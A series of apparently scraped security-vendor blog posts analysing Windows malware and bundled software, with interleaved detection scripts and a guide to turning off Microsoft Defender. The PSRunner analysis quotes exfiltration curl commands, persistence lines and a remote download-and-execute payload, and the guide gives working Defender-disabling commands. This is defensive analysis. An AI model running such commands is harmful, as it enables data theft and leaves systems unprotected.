HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

Suspicious network activity

The first thing DriverPack modifies during execution is the firewall settings, mostly to let its own executable files communicate with remote servers. Still, given that the developer does not specify the source of the drivers, granting such all-encompassing access is not a great thing.

"C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\\AppData\Roaming\DRPSu\temp\run_command_26701.txt""
netsh advfirewall firewall delete rule name="DriverPack aria2c.exe"
rundll32 kernel32,Sleep
"C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Program Files (x86)\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\\AppData\Roaming\DRPSu\temp\run_command_45238.txt""
netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Program Files (x86)\DriverPack\tools\aria2c.exe"
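As an added example, not code from the Gridinsoft post, here is a small Python scanner that runs the three patterns described above (an .hta launched through mshta.exe with an --sfx payload, a csc.exe compile driven from a response file under AppData\Local\Temp, and a netsh advfirewall allow rule for a program) over the command lines shown above plus one constructed benign line; the rule names and regexes are my own.

```python
"""Scan process command lines for the DriverPack installer behaviours noted
above. Added example, not the post's code; rule names and regexes are mine."""
import re

# Command lines copied from the analysis above, plus one constructed
# benign line (notepad) to show that ordinary activity is not flagged.
SAMPLE_COMMANDS = [
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\\AppData\Local\Temp\wgulwvl5\wgulwvl5.cmdline"',
    r'"C:\Windows\SysWOW64\mshta.exe" "C:\Program Files (x86)\DriverPack\run.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} --sfx "software.exe"',
    r'netsh advfirewall firewall delete rule name="DriverPack aria2c.exe"',
    r'rundll32 kernel32,Sleep',
    r'netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Program Files (x86)\DriverPack\tools\aria2c.exe"',
    r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt',
]

# Each rule captures the detail worth reporting in a group named "detail".
RULES = [
    # mshta.exe running an .hta that is handed a self-extracting payload
    ("hta_with_sfx_payload",
     re.compile(r'mshta\.exe.*\.hta.*--sfx\s+"?(?P<detail>[^"\s]+)', re.I)),
    # csc.exe compiling code on the fly from a response file under Temp
    ("runtime_compile_from_temp",
     re.compile(r'csc\.exe.*@"?(?P<detail>[^"]*\\AppData\\Local\\Temp\\[^"]*\.cmdline)', re.I)),
    # an inbound allow rule created for a specific program
    ("firewall_allow_rule_added",
     re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule.*action=allow.*program="?(?P<detail>[^"]+)', re.I)),
]


def scan_command(cmd):
    """Return [(rule_name, detail), ...] for one command line ([] if clean)."""
    hits = []
    for name, pattern in RULES:
        match = pattern.search(cmd)
        if match:
            hits.append((name, match.group("detail")))
    return hits


def scan_commands(cmds):
    """Scan a sequence of command lines; one report entry per rule hit."""
    report = []
    for index, cmd in enumerate(cmds):
        for name, detail in scan_command(cmd):
            report.append({"index": index, "rule": name, "detail": detail})
    return report


if __name__ == "__main__":
    for entry in scan_commands(SAMPLE_COMMANDS):
        print(f"[{entry['rule']}] cmd #{entry['index']}: {entry['detail']}")
```

The delete rule and the rundll32 line are deliberately left unflagged: the concerning event is the allow rule being created, not a rule being removed.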

Payload

PUABundler:Win32/DriverPack utilizes the aria2c.exe utility to download several strangely-named files. This is rather concerning, as such filenames give no clue about the purpose of the file or its possible effects.

"C:\Windows\SysWOW64\mshta.exe" "C:\Program Files (x86)\DriverPack\run.hta" --sfx "c99687e9829de410b66ad7006b0604c3fddb4582050ce205c1d00ff9f309e6b8.exe"
C:\Program Files (x86)\DriverPack\run.hta --sfx "c99687e9829de410b66ad7006b0604c3fddb4582050ce205c1d00ff9f309e6b8.exe"
C:\Program Files (x86)\DriverPack\start.bat "c99687e9829de410b66ad7006b0604c3fddb4582050ce205c1d00ff9f309e6b8.exe"

This represents just a fraction of what DriverPack downloads. During installation, it downloads the bundled applications – several browsers, a strange copy of Avast antivirus, and the “widgets” for the DriverPack itself. As there is no way to disable the installation of these bundled apps, this is just another concerning element of that program.

C:\Program Files (x86)\DriverPack\Tools\driverpack-wget.exe
C:\Program Files (x86)\DriverPack\programs\AvastAntivirusA.exe
C:\Program Files (x86)\DriverPack\programs\downloader_elements.exe
C:\Program Files (x86)\DriverPack\programs\downloader_browser.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverPack\DriverPack.lnk

During execution, the shell displays a “virtual assistant” that occasionally speaks to the user. Nothing really malicious here, but it may be spooky to someone who did not expect a program installer to have sound effects. And overall, there are more than enough problems for the DriverPack to be considered a dangerous thing.

How To Remove DriverPack?

Manual removal of PUABundler:Win32/DriverPack is not really an option, so I recommend an automated removal with GridinSoft Anti-Malware. Follow the guide below to get your system cleaned of DriverPack PUA and all other malicious elements that may be present.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

How to Disable Windows Defender? Windows 10 & 11 Guide https://gridinsoft.com/blogs/how-to-disable-windows-defender/ Thu, 08 Aug 2024 13:52:28 +0000
Disabling Microsoft Defender is something Windows users all around the world often think about. Although it is undoubtedly a solid antivirus tool, it may cause issues here and there that prompt such a wish. In this guide, I’ll explain how to fully disable Microsoft Defender.

How to Disable Microsoft Defender in Windows 10/Windows 11

There are two ways to disable Microsoft Defender: one is temporary, and the other is permanent. We’ll skip the temporary method since you’re probably here for the latter. Since the Microsoft Defender versions in Windows 10 and 11 are almost identical, this guide is applicable to both. A crucial note – these actions are only possible if you’re using an administrator account.

One more warning: I don’t recommend disabling Microsoft Defender, as this will leave your system unprotected and could have negative consequences. If you have reliable anti-malware software, like GridinSoft Anti-Malware, already running in the system, then it is fine. Otherwise, you expose your system to a significant malware risk.

Let’s begin. The first thing you need to do is disable Tamper Protection – a self-protection feature of Defender that prevents it from being disabled or tampered with externally. To do this, open Windows Security, click on Virus & Threat Protection → Manage settings.

Disable Defender step 1

Scroll down to Tamper Protection and turn it off. This will allow you to proceed with the next steps.

Tampering protection off

Next, open the Group Policy Editor. To do this, press the “Win + R” keys on your keyboard, and in the Run dialog that appears, type or paste “gpedit.msc” and press Enter.

gpedit window

In the window that opens, navigate to the following path:

Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

GPEdit Defender

Find the setting named “Turn Off Microsoft Defender Antivirus,” double-click it, select “Enabled,” and then click Apply and OK to apply the changes.

Disable Windows Defender GPEdit

Disabling Microsoft Defender with Regedit

For some users, such as those with the Windows 11 Home edition, the previously mentioned method won’t work because these versions don’t have access to the Group Policy Editor. In this case, you can use the Registry Editor. To do this, press the “Win + R” keys again and type “regedit”.

Disable Windows Defender regedit

In the Registry Editor window, navigate to the following path:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

In this folder, right-click on an empty space, create a new DWORD (32-bit) value, and name it “DisableAntiSpyware”.

Double-click on it to open it, set the Value data to “1”, and make sure the Base is set to “Hexadecimal”. Then click “OK.” Restart your PC to apply the changes, and this should disable Microsoft Defender.

DisableAntiSpyware registry entry

Disabling Microsoft Defender with Command Prompt

If you encounter any difficulties with the last method, you can also disable it using the Command Prompt. To do this, open the Start menu or search bar and begin typing “cmd”. When the Command Prompt appears, click “Run as Administrator.”

CMD run as admin

Copy the command below, paste it into the Command Prompt window, and press “Enter,” as shown in the screenshot below:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Disable Windows Defender cmd command

That command essentially performs the actions from the previous method. After making that change, reboot the computer for it to take effect.

Should You Disable Defender?

As I mentioned earlier, I don’t recommend disabling Microsoft Defender without a serious reason. The Windows system requires security solutions, and Microsoft addressed this by adding a built-in solution that meets the needs of most home users. This solution has undergone significant evolution and now offers a sufficient level of protection, including features like Zero Trust, sandboxing, and quite high effectiveness.

However, despite all the advantages, there’s another side to the story. All these features consume a significant amount of resources. While this may go unnoticed on modern, powerful machines, users with less powerful devices might experience some difficulties when using the system. This is particularly true for machines that use an HDD instead of an SSD. During background scanning, Microsoft Defender can noticeably strain the hard drive.

In any case, if you plan to disable Microsoft Defender completely, I don’t recommend leaving your system unprotected. Furthermore, I would suggest considering alternative solutions, such as GridinSoft Anti-Malware. It offers advanced functionality, including key components like proactive protection and an Internet Security module.

Trojan:Win32/Qhosts https://gridinsoft.com/blogs/trojan-win32-qhosts/ Mon, 05 Aug 2024 19:46:00 +0000
Trojan:Win32/Qhosts is malware that provides remote access to the target system and modifies the Hosts file. It is primarily distributed through illegal activation tools found on torrent and warez sites. While the mentioned interaction with that system configuration file is its defining feature, it is capable of much, much more unpleasant activities.

Trojan:Win32/Qhosts Overview

Trojan:Win32/Qhosts is a Microsoft Defender detection for dropper malware or remote-access trojans. Such malware is made to provide access to an infected system and deliver a payload. It is known for modifying the HOSTS system file, which is used to map hostnames to IP addresses. By doing so, it can provide itself with stable connectivity to the command server. In some cases, it does this to prevent the user from accessing antivirus vendors’ websites and getting security updates from Microsoft.

Trojan:Win32/Qhosts - Microsoft Defender Detection
Trojan:Win32/Qhosts Detection by Microsoft Defender

This malware is typically spread through dodgy software, like unauthorized activation tools, keygens and the like. Depending on the version, Trojan:Win32/Qhosts may block access to various services and sites, including those of Adobe and Microsoft. This partly explains its actions concerning the HOSTS file but does not account for its remote access capabilities. Sometimes, it also prevents antivirus software from accessing the Internet. This happens particularly often to software of renowned security vendors, whose server addresses are well-known.

Technical Analysis

Let’s get into the behavior analysis of Trojan:Win32/Qhosts using a specific instance as an example. In this case, it is a Windows activator, which has both its declared functionality and hidden malicious features. We’ll start with its launch, which is initiated by the user. Since this is an activator, it implies that the anti-malware software on the system must be disabled for its use. Despite this, the program performs standard checks for the presence of sandboxing/debugging or anti-malware software. It checks the following registry values and files:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\System\Setup
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2102.4-0\X86\MpOav.dll

Delivering the Payload

The malware then drops files into the system’s temporary directory. Among these files are both the payload and the files necessary for Windows activation. Regarding the former, the files include:

C:\Users\user\AppData\Local\Temp\RarSFX0\Install.cmd
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\bootsect.exe
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\grldr

It also drops a large number of certificates into the folder C:\Users\user\AppData\Local\Temp\RarSFX0\certs.

Malicious Activity

Next, the malware creates several new processes from the temporary folder, then creates and runs additional executable files.

C:\Users\\AppData\Local\Temp\RarSFX0\MSG.exe
C:\Users\\AppData\Local\Temp\RarSFX0\VLD.exe

The malware then executes Visual Basic scripts (install.vbs) using cscript.exe:

cscript //nologo "C:\Users\\AppData\Local\Temp\RarSFX0\install.vbs"
cscript //nologo C:\Windows\system32\slmgr.vbs -ipk HERE-GOES-WINDOWS-ACTIVATION-KEY

As you might have guessed, this script installs a license key into the system. That is actually one of the dangers of this malware: the victim sees the system activation process and thinks everything is fine. But meanwhile, the malware does its dirty job in the background.

Gaining Persistence

The actions of the program do not end there; the malware continues with establishing persistence in the system. This specific sample appears to work as a dropper, so maintaining constant access to the system is crucial. To achieve this, it modifies settings in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows and other system-level keys to ensure it can survive reboots and maintain control over the system. Additionally, the malware manipulates the following keys:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\CheckSetting

These keys are associated with checks performed by the Security and Maintenance feature in Windows. Each “CheckSetting” entry can correspond to a specific check such as firewall status, antivirus status, etc. This information also serves as part of system fingerprinting, an action that all malware does to distinguish attacked systems.

Hosts File Manipulation

The malware then proceeds to manipulate the hosts file. To do this, it creates a specific registry key:

HKEY_CURRENT_USER\SOFTWARE\WinRAR SFX\C%%Windows%System32%drivers%etc

This key is associated with self-extracting WinRAR archives. Based on the path, it is linked to a WinRAR operation affecting the hosts file. The malware drops a temporary file named __tmp_rar_sfx_access_check_34985937, which WinRAR creates during the extraction process of the self-extracting archive (SFX). The filename indicates a temporary access check to ensure the program has sufficient rights to overwrite the hosts file in this directory. Subsequently, the malware replaces the Hosts file with the one it needs.

This could be done for several reasons:

  1. To prevent the system from contacting the license verification server, ensuring that the illegal activation remains in place.
  2. To block system or anti-malware updates.
  3. To redirect the user to fraudulent websites.
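The hosts-file tampering just described can be checked for on the defender's side. The following Python auditor is an added example, not code from the post or from GridinSoft Anti-Malware: it parses a hosts file, flags mappings that sink or redirect update and security-vendor hostnames, and strips them. The watch-list, the sinkhole address set and the sample hosts file are constructed for illustration.

```python
"""Audit a Windows hosts file for the tampering described above: entries that
sink (block) or redirect update and security-vendor hostnames.
Added example, not the post's or GridinSoft's code."""

# Constructed watch-list of hostname suffixes such an attack targets:
# Windows Update, the vendors the post mentions, and an anti-malware site.
WATCHED_SUFFIXES = (
    "microsoft.com",
    "windowsupdate.com",
    "adobe.com",
    "gridinsoft.com",
)

# Mapping a name to one of these addresses makes it unreachable.
SINKHOLE_IPS = {"127.0.0.1", "0.0.0.0", "::1"}

# Constructed sample of a hosts file after tampering. 198.51.100.7 is from
# the RFC 5737 documentation range, standing in for an attacker-controlled host.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1 localhost
::1       localhost
0.0.0.0   update.microsoft.com      # blocks Windows Update
127.0.0.1 activate.adobe.com
127.0.0.1 gridinsoft.com www.gridinsoft.com
198.51.100.7 www.microsoft.com      # redirect to a fraudulent site
192.168.1.10 nas.local
"""


def parse_hosts(text):
    """Return (line_no, ip, hostname) for every mapping in a hosts file.

    One line may list several hostnames after the address; comments
    (anything after '#') and blank lines are skipped.
    """
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        body = raw.split("#", 1)[0].strip()
        fields = body.split()
        if len(fields) < 2:
            continue
        ip, names = fields[0], fields[1:]
        entries.extend((line_no, ip, name.lower()) for name in names)
    return entries


def is_watched(host):
    """True if host is one of the watched domains or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in WATCHED_SUFFIXES)


def find_suspicious(text):
    """Flag watched hostnames: 'blocked' if sent to a sinkhole address,
    'redirected' if pointed anywhere else (the third motive listed above)."""
    findings = []
    for line_no, ip, host in parse_hosts(text):
        if is_watched(host):
            kind = "blocked" if ip in SINKHOLE_IPS else "redirected"
            findings.append({"line": line_no, "ip": ip, "host": host, "kind": kind})
    return findings


def clean_hosts(text):
    """Return the hosts file with every flagged line removed.

    This is a conservative fix that keeps legitimate local entries; the
    post's tool instead resets the whole file to the Windows default.
    """
    bad_lines = {f["line"] for f in find_suspicious(text)}
    kept = [raw for i, raw in enumerate(text.splitlines(), start=1)
            if i not in bad_lines]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['host']} -> {f['ip']} ({f['kind']})")
```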

How To Remove Trojan:Win32/Qhosts?

Removing Trojan:Win32/Qhosts involves several steps and requires an advanced anti-malware solution. GridinSoft Anti-Malware is the one you can rely on in this matter. First, you need to clean the system of malware. After cleaning the system, you need to restore the hosts file. Follow the instructions below for each of the steps.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Restore the Hosts File

  1. Go to the Tools tab and click Reset Browser Settings.

    Reset Browser Settings

  2. Uncheck all boxes except for the one next to the HOSTS file and click Reset.

    HOSTS Reset

By following these steps, your system will be fully restored and ready for use.

PUABundler:Win32/YandexBundled https://gridinsoft.com/blogs/puabundler-win32-yandexbundled/ Wed, 31 Jul 2024 20:03:11 +0000
PUABundler:Win32/YandexBundled is a detection of a potentially unwanted application (PUA) associated with the Russian company Yandex. It is typically distributed as bundled software with repackaged or free programs. While less dangerous than malware, it can still threaten both the privacy and the normal operation of one’s computer.

What is PUABundler:Win32/YandexBundled?

PUABundler:Win32/YandexBundled is a generic detection name used by Windows Defender for potentially unwanted software from the Russian company Yandex. While Yandex and its products are legitimate (putting aside the fact that the company is Russian, which we’ll discuss later), their software distribution methods have led most anti-malware vendors to flag them as potentially unwanted.

PUABundler:Win32/YandexBundled detection screenshot
PUABundler:Win32/YandexBundled detection

Once run, YandexBundled installs its software and makes changes to system settings and the current browser without the user’s explicit permission. It modifies the browser’s homepage and default search engine. Early versions of Yandex software integrated so deeply into the system that they were almost impossible to remove manually. Now, it is easier to do, but the overall daring behavior of the program, along with its unwanted distribution sources, is what forces security vendors into flagging it.

Spreading Methods

There is an official Yandex product page, though it’s rare for users to intentionally download Yandex software. There are several primary methods of spreading PUABundler:Win32/YandexBundled:

Software Bundles. In this case, the program is usually included in the installation package of other software that the user intends to install. This is especially common with cracked repacks of paid software by Russian repackers.

“Recommended Software” in Free Programs. This is one of the few ways to monetize free software and a legal way to distribute potentially unwanted software. The only problem is that sometimes unscrupulous developers hide the checkboxes for installing additional software. As a result, the user cannot opt out of the installation.

Runtime Analysis

As mentioned earlier, one of the big issues with YandexBundled is the way it gets into the system. To demonstrate this, I found a sample that distributes Yandex software. This is a typical example of a bundled installer for various questionable programs. The file itself is called TapSetup.exe; I’ve encountered the same file name across the software offered on the same website, mostly cracked applications.

Software bundler screenshot
The software bundler contains Yandex elements

As we can see in the screenshot above, the icing on the cake is the footer of the installation window, where all checkboxes are enabled by default. This means that by clicking “Next,” Yandex software will be installed. Considering that people tend to click through the installation menus, all this junk may get in.

Yandex Browser screenshot
Yandex Browser

Unwanted Activity & Data Collection

After installation, users are greeted with a browser that promotes Russian services and sites. Moreover, regardless of the browser you use, the unwanted software changes settings and adds its extension to all installed browsers on the system. That is suboptimal, to say the least, as it is an automated action that happens without your consent. However, there is one more concerning thing to talk about.

Yandex services screenshot
Yandex services in Chrome

As I mentioned earlier, this is a Russian company, and in Russia, the “Sovereign Internet Law” is in effect. This means that all traffic should be recorded and kept on software providers’ servers. It may be accessed on demand by law enforcement without any additional permits. This is the key concern of having and using any Russian software on your computer. Even though similar speculations revolve around US companies and the FBI, the latter still requires a court order to access the information. And, well, you won’t likely be a point of interest for the feds unless you do something illegal.

Legal State Keylogger

One particular program that installs YandexBundled is Punto Switcher, a software whose developer Yandex acquired some time ago. In short, this program automatically switches the keyboard layout between multiple languages. As you might guess, for such an application to work correctly, it needs to read keystrokes, essentially functioning as a keylogger. Additionally, the application has a journaling feature that saves all entered information to a file. And since the program freely connects to the Internet, there is a high chance of this data ending up on Yandex servers.

Punto Switcher installer screenshot
Punto Switcher installer

Not only does Punto Switcher serve as a legal method for distributing PUABundler:Win32/YandexBundled (see the image below), but it also provides an excellent opportunity to legally monitor users. Although the application offers the option to disable auto-switching, it is unlikely that this would disable keystroke logging.

Technical Analysis

Let’s briefly look at the technical aspects of PUABundler:Win32/YandexBundled to determine how dangerous this unwanted software really is. One of the main concerns is that this software reads user/profile data from web browsers:

c:\Users\user\appdata\local\google\chrome\user data\default\history
c:\Users\user\appdata\local\google\chrome\user data\default\history-journal
c:\Users\user\appdata\local\google\chrome\user data\default\local storage\leveldb\current
c:\Users\user\appdata\local\google\chrome\user data\default\preferences
c:\Users\user\appdata\local\google\chrome\user data\default\top sites

While the program likely gets the profile info in order to transfer it to Yandex, this is once again an example of unauthorized access. Yandex software simply doesn’t care whether you want this to happen or not; it just does it, and consequently collects all of your data from this profile.

It gets even more concerning when we have a look at registry keys that the program accesses. It methodically goes through entries that contain information about installed programs and geolocation.

\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

While there may be a legitimate reason for the program to get this information, the overall nature of the software makes such sharing questionable.

How to Remove PUABundler:Win32/YandexBundled?

If you encounter PUABundler:Win32/YandexBundled, there are two ways to remove it. The first, and less effective, method is manual removal. The second, and recommended, method is using specialized tools. Since this unwanted software embeds itself deeply in the system, I recommend using the second method. GridinSoft Anti-Malware is an optimal solution, as it not only removes threats with just two clicks but also allows resetting browser settings with one click. This will remove all unwanted extensions and homepage settings.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:BAT/PSRunner.VS!MSR
https://gridinsoft.com/blogs/trojan-bat-psrunner-vs-msr/
Tue, 23 Jul 2024 18:12:28 +0000

Trojan:BAT/PSRunner.VS!MSR is a Microsoft Defender detection for a batch script that runs malicious commands on a compromised system. It does little damage by itself and serves mainly to deliver and run a payload; along the way it performs basic system reconnaissance and sets up persistence for that payload.

Trojan:BAT/PSRunner.VS!MSR Overview

Trojan:BAT/PSRunner.VS!MSR is a detection name used by Microsoft Defender Antivirus. This heuristic detection applies to batch files (.bat): scripts interpreted by cmd.exe which, in this case, call out to PowerShell for downloading and information gathering. Typically, the script downloads and executes additional malicious software, making it a simplified version of a dropper. Although less flexible than a compiled loader, PSRunner is still capable of making quite a mess in the system.

Trojan:BAT/PSRunner.VS!MSR detection window

Typically, it is spread through email attachments in phishing campaigns, the most popular tactic: the emails appear to come from legitimate sources and prompt the recipient to open the attachment or click a link. Additionally, the trojan can be downloaded from pirate or malicious websites disguised as cheats and mods for games. In that case the disguise is not an attachment but an entire game installer that serves as a shell around the malicious script.

Technical Analysis

Let's look at how Trojan:BAT/PSRunner.VS!MSR behaves once it is on a system. As a .bat file, it lacks advanced features like sandbox or debugger checks. It still tries to stay out of the user's sight: upon execution it sets the hidden and system attributes on its own file (%0 expands to the path of the running script), so it no longer appears in Explorer with default view settings:

attrib +h +s %0

Persistence

Next, the malware takes steps to establish persistence in the system. It executes the following commands:

set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul

The script thus creates Run-key entries in both HKLM and HKCU so that it is launched at every logon, and copies itself into the user's Startup folder as a second autostart path. A few details are worth noting. The randomised casing of the variable names (%rEgINf%, %VaLinf%) is cosmetic obfuscation: cmd.exe resolves variable names case-insensitively, so the commands work exactly as written while defeating naive case-sensitive string matching. The HKLM write only succeeds if the script runs elevated; otherwise reg add fails silently, since its output is sent to nul. The line appending to autoexec.bat is a leftover from DOS-era Windows, which current versions do not execute at boot. %a% in the last command is set elsewhere in the script and is not shown here.

As mentioned earlier, this is a plain batch script: the interpreter is cmd.exe, which spawns powershell.exe for individual steps. Unlike more advanced malware it cannot hide its processes, so a user could simply end the cmd.exe or powershell.exe process in Task Manager. The malware's next step is therefore to disable Task Manager through the per-user policy value DisableTaskMgr:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Gathering Information

Next, the malware collects information about the system, a step usually called fingerprinting. In this case the fingerprint is quite detailed. The malware first runs:

powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%usErPrOfiLE%\apps.txt"
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\apps.txt %WEbHooK%

The PowerShell command writes a list of installed applications to apps.txt, and the curl call uploads it. Two details stand out. The query reads only the Wow6432Node uninstall key, i.e. 32-bit applications on 64-bit Windows, so the inventory misses 64-bit and per-user installs. The chat_id and document multipart fields are those of the Telegram Bot API's sendDocument method, so %WEBHOOK% most likely holds a Telegram bot endpoint (its value is set elsewhere in the script and is not shown); a negative chat_id denotes a group chat. The script then gathers system information into userdata.txt (%IPV4% is not a built-in cmd.exe variable and must be set earlier in the script):

echo Username %usERnAME% >> userdata.txt
echo IP %IPV4% >> userdata.txt
echo. >> userdata.txt
ipconfig >> userdata.txt
echo. >> userdata.txt
getmac >> userdata.txt
echo. >> userdata.txt
wmic cpu get caption name, deviceid, numberofcores maxclockspeed, status >> userdata.txt
echo. >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
echo. >> userdata.txt
wmic partition get name,size,type >> userdata.txt
echo. >> userdata.txt
systeminfo >> userdata.txt
echo. >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt

After gathering this information, it uploads the file the same way and deletes the evidence:

curl -v -F "chat_id=-655682538" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
del userdata.txt
del apps.txt

By doing this, the malware transmits extensive system details: installed applications, network configuration including MAC addresses, hardware specifications, the full systeminfo output, and the OEM Windows product key stored in firmware (OA3xOriginalProductKey). Finally, it deletes userdata.txt and apps.txt to cover its tracks, although the data has already left the host.

Payload

The final stage of the script’s execution involves running the following command:

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
ping 127.0.0.1 3 > "e.txt"
start GetToken.exe

As we can see, the script uses PowerShell's WebClient to download an executable named GetToken.exe from Discord's attachment CDN and runs it, twice, with a ping in between apparently intended as a delay (the usual form is ping -n 3 127.0.0.1; the bare 3 is not a valid switch). The file names are chosen to look unremarkable. Discord attachment links of this form now carry expiry parameters, so the URL as captured is unlikely to still serve the payload.
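The persistence, Task Manager, fingerprinting and payload steps above share one analysis problem: the commands are readable, but the randomised casing of variables and the indirection through set defeat simple pattern matching on the raw file. The following Python script is an added example, not code from the article or from the malware: it expands cmd.exe variables the way cmd.exe does (case-insensitively, quotes kept) and then applies a small rule set to the expanded lines. The sample script inside it is constructed from the commands quoted in this post, nothing in it is executed or downloaded, and the ATT&CK technique IDs in the rule descriptions are the editor's mapping.

```python
"""Static triage of a batch dropper like the one analysed above.

Added example, not code from the article or from the malware it describes.
cmd.exe resolves %VARIABLE% names case-insensitively, so %rEgINf% costs the
malware nothing but defeats a case-sensitive grep for the Run key. This
script expands variables the way cmd.exe would, then runs rules over the
expanded lines.
"""
import re
from typing import Dict, List, Set

# Constructed sample: the commands quoted in the article, assembled into one
# script for analysis. Nothing here is executed or downloaded.
SAMPLE_BAT = r"""
attrib +h +s %0
set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
ipconfig >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\userdata.txt %WEBHOOk%
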